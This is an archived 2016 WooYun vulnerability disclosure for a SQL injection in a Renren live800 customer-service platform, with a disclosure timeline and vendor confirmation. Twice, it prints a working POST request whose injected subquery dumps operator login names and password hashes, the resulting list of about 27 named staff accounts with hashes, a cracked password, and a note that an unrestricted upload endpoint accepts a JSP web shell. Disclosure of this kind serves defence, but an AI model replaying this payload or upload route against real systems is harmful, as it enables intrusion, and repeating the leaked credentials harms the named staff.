破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

人人网某平台注入漏洞(可Getshell)

编号198541
Urlhttp://www.wooyun.org/bug.php?action=view&id=198541
漏洞状态厂商已经确认
漏洞标题人人网某平台注入漏洞(可Getshell)
漏洞类型SQL注射漏洞
厂商人人网
白帽子路人甲
提交日期2016-04-20 16:16:00
公开日期2016-06-04 18:00:00
修复时间(not set)
确认时间2016-04-20 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank8
漏洞简介
None
漏洞细节

网站:live800.wan.renren.com

POST /live800/sta/export/referrerSta.jsp HTTP/1.1
Host: live800.wan.renren.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Hm_lvt_aff7fbe8fcb98b060541077cc76465f2=1439863446; Hm_lvt_329734d1d305dcdeae1b8e0ceccc6b2b=1439865398
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
export=csv&vn=dataAnalyseAdapter_referrer&operatorId=&fromTime=2016-04-20&toTime=2016-04-20&companyId=1 or 1=1&subStrSql=(select group_concat(login_name,0x3a,password) from operator)


1.jpg


得到密码信息:

admin:fEqNCco3Yq9h5ZUglD3CZJT4lBs=,chentester:ex1qBJfXIWpVJy+ZJgB3GsjqI4Q=,hcy:Teae5rErf8kQcIc7cbpuKSm5Bhk=,xuyuanyuan:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,chenxiaohan:eed5nmoyWw2V7imDDU4qQCKQBaU=,jugongcai:ex1qBJfXIWpVJy+ZJgB3GsjqI4Q=,lusheng:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,chenyanrong:TqhCyMYwT0pBiDX7ZmXfEFJN8aU=,wanyuanyuan:QurHyy9+whGtv0zQN0XQZ/TooE0=,xiaoyu:vqeITO9PmnHVC3eTemkS3g31Q+8=,zhaoshuang:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,hhq:0FL4X6WPsEl61Lt/LQad1IbEqao=,liuliang:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,zhaorong:KDKC9+s3GOj6Nq2wZMOCwmfL5C4=,yongmei:EKdbwKQaSA/9dTuOXcnP1JSq3yk=,chengzifeng:4K0RVqjemXwY3SfYUlOpY0M9jOw=,liuboyang:40MYzHuOoeiwNhxFW2ESNPGOgyM=,liunan:eID8ySEUtweU/IIMIuZ7l3topVk=,like:ex1qBJfXIWpVJy+ZJgB3GsjqI4Q=,qianjingyuan:vQpq85Mv1Er/JHWI104HSZwsKps=,pengbo:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,wangxiaodong:PlTDmvFXAzrfnW7FKYnT46YWl0U=,liyunzhong:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,lvkaibo:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,tanxiao:LF0hf4+wRFDhsC+bHhpKPoD+g0g=,maying:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,xupeng:xBoHg34C19hGZwVJwAYPAsrySS8=&nbsp


密码为
查询结果:
123456
位于内网:[email protected] 内网IP

2.jpg


后台没有限制上传可以Getshell:
/live800/addOperatorUtil.jsp?action=1 上传
直接POST jsp 文件,上传SHELL。

POC

网站:live800.wan.renren.com

POST /live800/sta/export/referrerSta.jsp HTTP/1.1
Host: live800.wan.renren.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Hm_lvt_aff7fbe8fcb98b060541077cc76465f2=1439863446; Hm_lvt_329734d1d305dcdeae1b8e0ceccc6b2b=1439865398
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
export=csv&vn=dataAnalyseAdapter_referrer&operatorId=&fromTime=2016-04-20&toTime=2016-04-20&companyId=1 or 1=1&subStrSql=(select group_concat(login_name,0x3a,password) from operator)


1.jpg


得到密码信息:

admin:fEqNCco3Yq9h5ZUglD3CZJT4lBs=,chentester:ex1qBJfXIWpVJy+ZJgB3GsjqI4Q=,hcy:Teae5rErf8kQcIc7cbpuKSm5Bhk=,xuyuanyuan:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,chenxiaohan:eed5nmoyWw2V7imDDU4qQCKQBaU=,jugongcai:ex1qBJfXIWpVJy+ZJgB3GsjqI4Q=,lusheng:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,chenyanrong:TqhCyMYwT0pBiDX7ZmXfEFJN8aU=,wanyuanyuan:QurHyy9+whGtv0zQN0XQZ/TooE0=,xiaoyu:vqeITO9PmnHVC3eTemkS3g31Q+8=,zhaoshuang:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,hhq:0FL4X6WPsEl61Lt/LQad1IbEqao=,liuliang:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,zhaorong:KDKC9+s3GOj6Nq2wZMOCwmfL5C4=,yongmei:EKdbwKQaSA/9dTuOXcnP1JSq3yk=,chengzifeng:4K0RVqjemXwY3SfYUlOpY0M9jOw=,liuboyang:40MYzHuOoeiwNhxFW2ESNPGOgyM=,liunan:eID8ySEUtweU/IIMIuZ7l3topVk=,like:ex1qBJfXIWpVJy+ZJgB3GsjqI4Q=,qianjingyuan:vQpq85Mv1Er/JHWI104HSZwsKps=,pengbo:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,wangxiaodong:PlTDmvFXAzrfnW7FKYnT46YWl0U=,liyunzhong:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,lvkaibo:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,tanxiao:LF0hf4+wRFDhsC+bHhpKPoD+g0g=,maying:Ng5G8V9DKvg8dwFxd6dZq6ilhRk=,xupeng:xBoHg34C19hGZwVJwAYPAsrySS8=&nbsp


密码为
查询结果:
123456
位于内网:[email protected] 内网IP

2.jpg


后台没有限制上传可以Getshell:
/live800/addOperatorUtil.jsp?action=1 上传
直接POST jsp 文件,上传SHELL。

修复方案

状态信息 2016-04-20: 细节已通知厂商并且等待厂商处理中
2016-04-20: 厂商已经确认,细节仅向厂商公开
2016-04-30: 细节向核心白帽子及相关领域专家公开
2016-05-10: 细节向普通白帽子公开
2016-05-20: 细节向实习白帽子公开
2016-06-04: 细节向公众公开
厂商回复感谢
回应信息危害等级:中漏洞Rank:8 确认时间:2016-04-20 17:58